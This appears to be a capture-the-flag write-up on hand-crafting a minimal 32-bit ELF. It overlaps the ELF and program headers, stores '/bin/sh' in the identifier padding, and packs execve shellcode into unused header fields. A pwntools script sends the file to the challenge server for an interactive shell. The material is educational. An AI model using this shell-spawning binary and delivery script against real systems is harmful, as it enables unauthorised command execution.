Writing micro-shellcode in ELF format by hand
The smallest possible 64 bit ELF is 80 bytes. Can you golf it down to 79 bytes?
Attached to the task is the binary that runs on a remote server. Opening it in Ghidra, we see what is required of us:
So the only way to solve the task and get the flag is to write an executable ELF file, because the signature at the beginning of the file is checked. Just in case, I also checked the Linux kernel source for other ways to run a file that starts with such a signature, but unfortunately a shebang line must begin with #!, and the other file formats are provided by kernel modules and are not suitable either.
Learning the ELF format
Armed with the standard, let's try to build at least some executable ELF file.
To begin with, we see that the file must begin with an ELF header, the structure of which is described as follows:
#define EI_NIDENT 16
typedef struct {
    unsigned char e_ident[EI_NIDENT];
    Elf32_Half    e_type;
    Elf32_Half    e_machine;
    Elf32_Word    e_version;
    Elf32_Addr    e_entry;
    Elf32_Off     e_phoff;
    Elf32_Off     e_shoff;
    Elf32_Word    e_flags;
    Elf32_Half    e_ehsize;
    Elf32_Half    e_phentsize;
    Elf32_Half    e_phnum;
    Elf32_Half    e_shentsize;
    Elf32_Half    e_shnum;
    Elf32_Half    e_shstrndx;
} Elf32_Ehdr;
The fields use the format's own data types. For the 32-bit ELF format they are defined just above this structure in the document (the 64-bit format has different definitions):
Name | Size | Alignment | Explanation |
Elf32_Addr | 4 | 4 | Unsigned program address |
Elf32_Half | 2 | 2 | Unsigned medium integer |
Elf32_Off | 4 | 4 | Unsigned file offset |
Elf32_Sword | 4 | 4 | Signed large integer |
Elf32_Word | 4 | 4 | Unsigned large integer |
unsigned char | 1 | 1 | Unsigned small integer |
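The sizes in this table map directly onto the format codes of Python's standard struct module, which gives a quick way to check how large the header should be. This is only a sketch; the names ELF32_TYPES and EHDR_FORMAT are made up for the illustration and do not come from the specification.

```python
import struct

# struct format codes that match the ELF32 data types from the table
ELF32_TYPES = {
    "Elf32_Addr": "I",     # 4 bytes, unsigned
    "Elf32_Half": "H",     # 2 bytes, unsigned
    "Elf32_Off": "I",      # 4 bytes, unsigned
    "Elf32_Sword": "i",    # 4 bytes, signed
    "Elf32_Word": "I",     # 4 bytes, unsigned
    "unsigned char": "B",  # 1 byte, unsigned
}

# "<" selects little-endian byte order and disables implicit padding
for name, code in ELF32_TYPES.items():
    print(name, struct.calcsize("<" + code))

# Elf32_Ehdr: e_ident[16], 2 x Half, Word, Addr, 2 x Off, Word, 6 x Half
EHDR_FORMAT = "<16sHHIIIIIHHHHHH"
EHDR_SIZE = struct.calcsize(EHDR_FORMAT)
print("Elf32_Ehdr size:", EHDR_SIZE)
```

Every field in this structure already sits on its natural alignment, so packing without padding should give the same layout a C compiler would produce.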
The header fields themselves have the following meaning:
e_ident: ELF file identifier (described in detail below)
e_type: type of the ELF file; for our purposes the value 2, "Executable file", is suitable
e_machine: the processor architecture required to work with the ELF file. The list of values in the document is incomplete (for example, the GCC compiler on my system writes 0x3e, "Advanced Micro Devices X86-64"); we choose 3, "Intel 80386", for the reason given below
e_version: according to the document, must be equal to 1
e_entry: an important field for us, the address of the program's entry point in memory (not an offset from the beginning of the file)
e_phoff: another important field, the offset from the beginning of the file to the program headers, which are used to run the ELF file
e_shoff: the offset to the section headers, which are used to link the file; for our purposes its value plays no role, which will be important later
e_flags: processor-specific flags; as it turned out, also not important
e_ehsize: the size of the ELF header; despite its apparent significance, the Linux kernel apparently ignores this field when starting the file
e_phentsize: the size of each program header, 32 bytes in our case, matching the program header structure in the specification
e_phnum: number of program headers, 1
e_shentsize: the size of each section header, 0
e_shnum: number of section headers, must be 0
e_shstrndx: index of the section header for the section name string table, must also be 0
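Because several of these fields matter later only through their position in the file, it can help to compute the byte offset of each one. A minimal sketch using the standard struct module; EHDR_FIELDS and field_offsets are illustrative names, not part of any library.

```python
import struct

# Field names of Elf32_Ehdr with little-endian struct codes for their types
EHDR_FIELDS = [
    ("e_ident", "16s"),
    ("e_type", "H"),
    ("e_machine", "H"),
    ("e_version", "I"),
    ("e_entry", "I"),
    ("e_phoff", "I"),
    ("e_shoff", "I"),
    ("e_flags", "I"),
    ("e_ehsize", "H"),
    ("e_phentsize", "H"),
    ("e_phnum", "H"),
    ("e_shentsize", "H"),
    ("e_shnum", "H"),
    ("e_shstrndx", "H"),
]


def field_offsets(fields):
    """Return ({field name: byte offset}, total size) for a packed layout."""
    offsets = {}
    position = 0
    for name, code in fields:
        offsets[name] = position
        position += struct.calcsize("<" + code)
    return offsets, position


offsets, total_size = field_offsets(EHDR_FIELDS)
for name, offset in offsets.items():
    print(f"{offset:2d}  {name}")
print("total:", total_size)
```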
At this stage of reading, it is not very clear what the endianness of numbers should be, and the documentation answers this question below, in the section on ELF identification. The ELF file ID is 16 bytes long (as mentioned above) and has the following structure:
Signature: \x7fELF, or 7f 45 4c 46 in hexadecimal
File class: 1 for ELF32, 2 for ELF64
Encoding: 1 for little-endian, 2 for big-endian
Version: same as the header's version field, 1
Padding: 9 zero bytes to pad the identifier to 16 bytes; the standard ignores their value
Much further down, in the Intel-specific section, the document states that the identification must use little-endian encoding and that the e_machine field must be 3.
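The layout of the identifier is simple enough to build and read back by hand. The following is a small sketch of that; build_ident and parse_ident are hypothetical helper names chosen for this example.

```python
def build_ident(file_class=1, encoding=1, version=1):
    """Build the 16-byte e_ident: signature, class, encoding, version, padding."""
    ident = b"\x7fELF" + bytes([file_class, encoding, version]) + bytes(9)
    assert len(ident) == 16
    return ident


def parse_ident(ident):
    """Decode the meaningful bytes of e_ident; the 9 padding bytes are ignored."""
    if ident[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    return {
        "class": {1: "ELF32", 2: "ELF64"}.get(ident[4], "unknown"),
        "encoding": {1: "little-endian", 2: "big-endian"}.get(ident[5], "unknown"),
        "version": ident[6],
    }


print(parse_ident(build_ident()))
```

Since the parser never looks at the last 9 bytes, an identifier with arbitrary data in the padding decodes to the same result.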
Now everything is ready to assemble the first header of the file:
elf_header = bytes([
    *b'\x7fELF', 1, 1, 1, *([0] * 9),  # e_ident
    *2 .to_bytes(2, 'little'),         # e_type
    *3 .to_bytes(2, 'little'),         # e_machine
    *1 .to_bytes(4, 'little'),         # e_version
    *0 .to_bytes(4, 'little'),         # e_entry TODO
    *52 .to_bytes(4, 'little'),        # e_phoff
    *0 .to_bytes(4, 'little'),         # e_shoff
    *0 .to_bytes(4, 'little'),         # e_flags
    *52 .to_bytes(2, 'little'),        # e_ehsize
    *32 .to_bytes(2, 'little'),        # e_phentsize
    *1 .to_bytes(2, 'little'),         # e_phnum
    *0 .to_bytes(2, 'little'),         # e_shentsize
    *0 .to_bytes(2, 'little'),         # e_shnum
    *0 .to_bytes(2, 'little'),         # e_shstrndx
])
The e_entry field is left unfilled here because we do not know what to put in it yet. So it is time to move on to the second header, the program header. Its structure is described as follows:
typedef struct {
    Elf32_Word p_type;
    Elf32_Off  p_offset;
    Elf32_Addr p_vaddr;
    Elf32_Addr p_paddr;
    Elf32_Word p_filesz;
    Elf32_Word p_memsz;
    Elf32_Word p_flags;
    Elf32_Word p_align;
} Elf32_Phdr;
Description of fields:
p_type: segment type; in our case it will be 1, "Loadable"
p_offset: offset from the beginning of the file to the contents of the segment
p_vaddr: virtual address of the segment
p_paddr: physical address of the segment, for operating systems that do not use virtual addressing
p_filesz: size of the segment in the file
p_memsz: size of the segment in memory; it cannot be less than p_filesz, and if it is greater, the tail of the segment is filled with zeros
p_flags: segment flags; in our case the value 5, which combines the flag values 1 (execute) and 4 (read)
p_align: the required segment alignment; in practice it turned out that it cannot be completely arbitrary, and on Linux the value 0x1000, which matches the alignment of virtual memory pages, worked
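The program header consists of eight 4-byte words, so it can also be packed with the standard struct module. A hedged sketch: the constant names follow the usual ELF naming (PT_LOAD, PF_X, PF_W, PF_R), while build_phdr is a helper invented for this example.

```python
import struct

PT_LOAD = 1                 # "Loadable" segment type
PF_X, PF_W, PF_R = 1, 2, 4  # execute, write, read permission flags

PHDR_FORMAT = "<8I"         # eight little-endian 32-bit words


def build_phdr(offset, vaddr, size, flags=PF_R | PF_X, align=0x1000):
    """Pack an Elf32_Phdr for a loadable segment with p_filesz == p_memsz."""
    return struct.pack(
        PHDR_FORMAT,
        PT_LOAD,  # p_type
        offset,   # p_offset
        vaddr,    # p_vaddr
        vaddr,    # p_paddr (same as p_vaddr here)
        size,     # p_filesz
        size,     # p_memsz
        flags,    # p_flags
        align,    # p_align
    )


phdr = build_phdr(offset=0, vaddr=0x08048000, size=93)
print(len(phdr), phdr.hex())
```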
Now we can write the program header:
program_header = bytes([
    *1 .to_bytes(4, 'little'),       # p_type
    *0 .to_bytes(4, 'little'),       # p_offset TODO
    *0 .to_bytes(4, 'little'),       # p_vaddr TODO
    *0 .to_bytes(4, 'little'),       # p_paddr TODO
    *0 .to_bytes(4, 'little'),       # p_filesz TODO
    *0 .to_bytes(4, 'little'),       # p_memsz TODO
    *5 .to_bytes(4, 'little'),       # p_flags
    *0x1000 .to_bytes(4, 'little'),  # p_align
])
In this header quite a few values are again left for later, which means it is time to write the code of the program itself. For simplicity, let's just write a successful exit:
mov eax, 1 ; sys_exit system call number
xor ebx, ebx ; returned status code
int 0x80 ; software interrupt, the system call entry in Linux
To assemble the file I use pwntools, so the resulting code looks like this:
from pwn import *

MEMORY_START = 0x1000

# exit(0) through the 32-bit int 0x80 interface
code = asm(f'''
    mov eax, 1
    xor ebx, ebx
    int 0x80
''', arch="x86", os="linux")

elf_header = bytes([
    *b'\x7fELF', 1, 1, 1, *([0] * 9),            # e_ident
    *2 .to_bytes(2, 'little'),                   # e_type
    *3 .to_bytes(2, 'little'),                   # e_machine
    *1 .to_bytes(4, 'little'),                   # e_version
    *(MEMORY_START + 84).to_bytes(4, 'little'),  # e_entry: code follows the 52 + 32 header bytes
    *52 .to_bytes(4, 'little'),                  # e_phoff
    *0 .to_bytes(4, 'little'),                   # e_shoff
    *0 .to_bytes(4, 'little'),                   # e_flags
    *52 .to_bytes(2, 'little'),                  # e_ehsize
    *32 .to_bytes(2, 'little'),                  # e_phentsize
    *1 .to_bytes(2, 'little'),                   # e_phnum
    *0 .to_bytes(2, 'little'),                   # e_shentsize
    *0 .to_bytes(2, 'little'),                   # e_shnum
    *0 .to_bytes(2, 'little'),                   # e_shstrndx
])

program_header = bytes([
    *1 .to_bytes(4, 'little'),                   # p_type
    *0 .to_bytes(4, 'little'),                   # p_offset
    *MEMORY_START.to_bytes(4, 'little'),         # p_vaddr
    *MEMORY_START.to_bytes(4, 'little'),         # p_paddr
    *(84 + len(code)).to_bytes(4, 'little'),     # p_filesz
    *(84 + len(code)).to_bytes(4, 'little'),     # p_memsz
    *5 .to_bytes(4, 'little'),                   # p_flags
    *0x1000 .to_bytes(4, 'little'),              # p_align
])

print(len(elf_header), elf_header)
print(len(program_header), program_header)
print(len(code), code)

with open('./result', 'wb') as f:
    f.write(elf_header)
    f.write(program_header)
    f.write(code)
So far we have glossed over the choice of values for p_vaddr and p_paddr. On my system 0x1000 works, but when all the work was done and it was time to send the solution to the server, the program refused to run there. It turned out that Ubuntu Linux, for example, sets the vm.mmap_min_addr limit to 0x10000. In general, it is advisable to use the value 0x8048100, which is described in the document in the section "Operating System Specific (UNIX System V Release 4)".
The segment also cannot be loaded from just anywhere in the file. For example, you cannot map only the bytes that follow the headers to a page-aligned address, because their file offset is not aligned to 0x1000 as p_align requires. Therefore we load the segment from the very beginning of the file and set the entry point to the code that follows the headers.
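Both constraints from this part of the story can be expressed as a small check. This is a simplified sketch rather than the kernel's actual logic: check_segment is a hypothetical helper, the default of 0x10000 is the Ubuntu limit mentioned above, and the alignment rule is the specification's requirement that p_offset and p_vaddr agree modulo p_align.

```python
def check_segment(p_offset, p_vaddr, p_align=0x1000, mmap_min_addr=0x10000):
    """Return a list of reasons why a loadable segment may be rejected."""
    problems = []
    if p_vaddr < mmap_min_addr:
        problems.append("p_vaddr is below vm.mmap_min_addr")
    if p_align > 1 and p_offset % p_align != p_vaddr % p_align:
        problems.append("p_offset and p_vaddr differ modulo p_align")
    return problems


# The first attempt: fine locally, rejected where mmap_min_addr is 0x10000
print(check_segment(p_offset=0, p_vaddr=0x1000))
# Mapping only the bytes after the 84 header bytes to a page-aligned address
print(check_segment(p_offset=84, p_vaddr=0x08048000))
# Mapping the file from its beginning at a conventional address
print(check_segment(p_offset=0, p_vaddr=0x08048000))
```

On a real system the limit can be read from /proc/sys/vm/mmap_min_addr and passed in as mmap_min_addr.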
Let’s check that everything works:
Of course, this is not the required 79 bytes, but at least it works. And 93 bytes is not bad either, albeit for a program that does nothing.
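The 93 bytes can be accounted for without an assembler by writing out the machine code for the three instructions. The encodings below are the usual ones for 32-bit x86; an assembler may pick an equivalent encoding for xor ebx, ebx, but the length stays the same. EXIT_CODE and the size constants are names chosen for this sketch.

```python
# Machine code for the exit(0) program, one instruction per line
EXIT_CODE = bytes([
    0xb8, 0x01, 0x00, 0x00, 0x00,  # mov eax, 1
    0x31, 0xdb,                    # xor ebx, ebx
    0xcd, 0x80,                    # int 0x80
])

EHDR_SIZE = 52  # Elf32_Ehdr
PHDR_SIZE = 32  # Elf32_Phdr

total = EHDR_SIZE + PHDR_SIZE + len(EXIT_CODE)
print(f"{EHDR_SIZE} + {PHDR_SIZE} + {len(EXIT_CODE)} = {total}")
```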
Compressing the file
In order to reduce the file size, let’s look at it in hexadecimal code:
Our ELF header is marked in red, the program header is in green, the rest is code.
The first thing that catches the eye here is that the last 8 bytes of the ELF header coincide with the first 8 bytes of the program header, so the two headers can overlap. Moreover, this overlap costs us almost nothing as programmers, because these bytes mostly hold values that we could not have replaced with anything else anyway without breaking the file.
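The coincidence is easy to confirm by packing both headers and comparing the bytes. A minimal sketch with the standard struct module, using the field values from the 93-byte file; the variable names are illustrative.

```python
import struct

ident = b"\x7fELF\x01\x01\x01" + bytes(9)

# Elf32_Ehdr with the values from the first working file
ehdr = struct.pack(
    "<16sHHIIIIIHHHHHH",
    ident, 2, 3, 1,      # e_ident, e_type, e_machine, e_version
    0x1000 + 84, 52,     # e_entry, e_phoff
    0, 0, 52,            # e_shoff, e_flags, e_ehsize
    32, 1, 0, 0, 0,      # e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
)

# Elf32_Phdr: p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
phdr = struct.pack("<8I", 1, 0, 0x1000, 0x1000, 93, 93, 5, 0x1000)

print(ehdr[-8:].hex())
print(phdr[:8].hex())

# e_phnum, e_shentsize, e_shnum, e_shstrndx read the same as p_type, p_offset
same_bytes = ehdr[-8:] == phdr[:8]
overlapped_size = len(ehdr) + len(phdr) - 8
print(same_bytes, overlapped_size)
```

If the headers are overlapped this way, the program header starts at offset 52 - 8 = 44, which is the value e_phoff has to take.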
Now let's think about what we actually want to do. Space is clearly tight, so we will not read the flag file (which is in the same directory and is named flag.txt) and print it to the screen ourselves. Instead, let's try the classic trick of running /bin/sh.
This takes just one system call, but the string with the path to run still has to be stored somewhere. This is where the 9 padding bytes at the end of the identifier come in handy! We are also supposed to pass the argv and envp arrays for arguments and environment variables, but we will simply ignore that and pass null pointers. Fortunately this is allowed, and what's more, when the program starts the system has already filled all the registers with zeros for us, so we do not have to do anything at all. With these optimizations, the code now looks like this:
from pwn import *

MEMORY_START = 0x08048000
HEADER_LENGTH = 76

# execve("/bin/sh", NULL, NULL); the path string lives in e_ident at offset 8
code = asm(f'''
    mov eax, 11
    mov ebx, {MEMORY_START + 8}
    int 0x80
''', arch="x86", os="linux")

header = bytes([
    *b'\x7fELF', 1, 1, 1, 0, *b'/bin/sh', 0,                # e_ident
    2, 0, 3, 0, 1, 0, 0, 0,                                 # e_type, e_machine, e_version
    *(MEMORY_START + HEADER_LENGTH).to_bytes(4, 'little'),  # e_entry
    44, 0, 0, 0,                                            # e_phoff
    *([0] * 10),                                            # e_shoff, e_flags, e_ehsize
    32, 0, 1, 0, 0, 0, 0, 0, 0, 0,                          # e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    # the last 8 bytes above double as p_type, p_offset
    *MEMORY_START.to_bytes(4, 'little'),                    # p_vaddr
    *MEMORY_START.to_bytes(4, 'little'),                    # p_paddr
    *HEADER_LENGTH.to_bytes(4, 'little'),                   # p_filesz
    *HEADER_LENGTH.to_bytes(4, 'little'),                   # p_memsz
    5, 0, 0, 0, 0, 0x10, 0, 0,                              # p_flags, p_align
])
assert len(header) == HEADER_LENGTH

print(len(header), header)
print(len(code), code)

with open('./result', 'wb') as f:
    f.write(header)
    f.write(code)
Check if it still works:
At this stage it is already becoming clear where the 76 bytes from the preface come from: all that is left is to tuck the assembly code away somewhere.
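One way to convince ourselves that the overlapped layout is still consistent is to read the same 76 bytes back twice: once as an ELF header from offset 0 and once as a program header from e_phoff. The sketch below rebuilds the header with the standard struct module instead of pwntools and leaves out the code that follows it in the file.

```python
import struct

MEMORY_START = 0x08048000
HEADER_LENGTH = 76

header = (
    b"\x7fELF\x01\x01\x01\x00/bin/sh\x00"                      # e_ident with the path inside
    + struct.pack("<HHI", 2, 3, 1)                             # e_type, e_machine, e_version
    + struct.pack("<II", MEMORY_START + HEADER_LENGTH, 44)     # e_entry, e_phoff
    + bytes(10)                                                # e_shoff, e_flags, e_ehsize
    + struct.pack("<HHHHH", 32, 1, 0, 0, 0)                    # e_phentsize .. e_shstrndx
    + struct.pack("<IIII", MEMORY_START, MEMORY_START,
                  HEADER_LENGTH, HEADER_LENGTH)                # p_vaddr, p_paddr, p_filesz, p_memsz
    + struct.pack("<II", 5, 0x1000)                            # p_flags, p_align
)

# View 1: the ELF header at offset 0
ehdr = struct.unpack_from("<16sHHIIIIIHHHHHH", header, 0)
e_phoff, e_phnum = ehdr[5], ehdr[10]

# View 2: the program header at e_phoff, sharing 8 bytes with view 1
phdr = struct.unpack_from("<8I", header, e_phoff)

print(len(header), e_phoff, e_phnum)
print([hex(value) for value in phdr])
```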
Packing the code in the header
First, let’s see how we can generally reduce our current code:
mov eax, 11
mov ebx, 0x08048008
int 0x80
Clearly, the last instruction cannot be shortened. Filling ebx cannot be shortened much either: the encoding depends on the value, but it will certainly not fit in 2 bytes. Initializing eax, however, is easily rewritten as mov al, 11, since the register starts out zeroed:
0: b0 0b mov al, 0xb
2: bb 08 80 04 08 mov ebx, 0x8048008
7: cd 80 int 0x80
That leaves only 9 bytes! Recall from the beginning of the story that the e_shoff, e_flags and e_ehsize fields are not used, and together they occupy exactly 10 bytes in the header. All that remains is to put everything together:
MEMORY_START = 0x08048000
HEADER_LENGTH = 76

header = bytes([
    *b'\x7fELF', 1, 1, 1, 0, *b'/bin/sh', 0,           # e_ident
    2, 0, 3, 0, 1, 0, 0, 0,                            # e_type, e_machine, e_version
    *(MEMORY_START + 32).to_bytes(4, 'little'),        # e_entry: the code sits at offset 32
    44, 0, 0, 0,                                       # e_phoff
    0xb0, 0x0b,                                        # mov al, 11
    0xbb, *(MEMORY_START + 8).to_bytes(4, 'little'),   # mov ebx, MEMORY_START + 8
    0xcd, 0x80,                                        # int 0x80
    0,                                                 # the one byte of e_ehsize left unused
    32, 0, 1, 0, 0, 0, 0, 0, 0, 0,                     # e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    # the last 8 bytes above double as p_type, p_offset
    *MEMORY_START.to_bytes(4, 'little'),               # p_vaddr
    *MEMORY_START.to_bytes(4, 'little'),               # p_paddr
    *HEADER_LENGTH.to_bytes(4, 'little'),              # p_filesz
    *HEADER_LENGTH.to_bytes(4, 'little'),              # p_memsz
    5, 0, 0, 0, 0, 0x10, 0, 0,                         # p_flags, p_align
])
assert len(header) == HEADER_LENGTH

print(len(header), header)

with open('./result', 'wb') as f:
    f.write(header)
You can see how we went from elf_header, program_header and code, first to header and code, and now to just header =)
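The placement of the code inside the header can be double-checked with a few lines of arithmetic. This is a sketch under the layout described above (the unused e_shoff, e_flags and e_ehsize fields start at offset 32 and span 10 bytes); UNUSED_START, UNUSED_SIZE and the other names are made up for the example.

```python
import struct

MEMORY_START = 0x08048000

# Hand-assembled execve("/bin/sh", NULL, NULL); relies on zeroed registers at start
shellcode = (
    b"\xb0\x0b"                                      # mov al, 11
    + b"\xbb" + struct.pack("<I", MEMORY_START + 8)  # mov ebx, address of "/bin/sh"
    + b"\xcd\x80"                                    # int 0x80
)

UNUSED_START = 32  # offset of e_shoff
UNUSED_SIZE = 10   # e_shoff (4) + e_flags (4) + e_ehsize (2)

# Whatever the code does not use is filled with zero bytes
padding = bytes(UNUSED_SIZE - len(shellcode))
entry_point = MEMORY_START + UNUSED_START

print(len(shellcode), len(padding), hex(entry_point))
print(shellcode.hex(" "))
```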
First, let’s make sure the kernel can still run the file:
There are, of course, some unpleasant side effects. For example, gdb now refuses to run our file. This can be worked around by running it through gdbserver, but it is still annoying.
Getting the flag
To get the flag, let's write one more script, so that we do not have to fiddle with redirecting input first from the file and then from the terminal, or anything like that:
from pwn import *

# sh = process(['./chal'])
sh = remote(...)

# send the crafted ELF file, then hand the connection over to the terminal
with open('result', 'rb') as f:
    sh.send(f.read())

sh.interactive()
And finally, we get the flag:
Afterword
Of course, many points were skipped along the way, both in solving the task and in the details of the ELF format, but this material should be read primarily as a how-to for solving similar CTF tasks, that is, as a write-up rather than a full-fledged textbook on the ELF format.
Thanks for reading! I hope the above was interesting. Do not be afraid to dig into specifications, and even more so, do not treat the workings of individual parts of a computer or operating system as something magical. Everything has sources.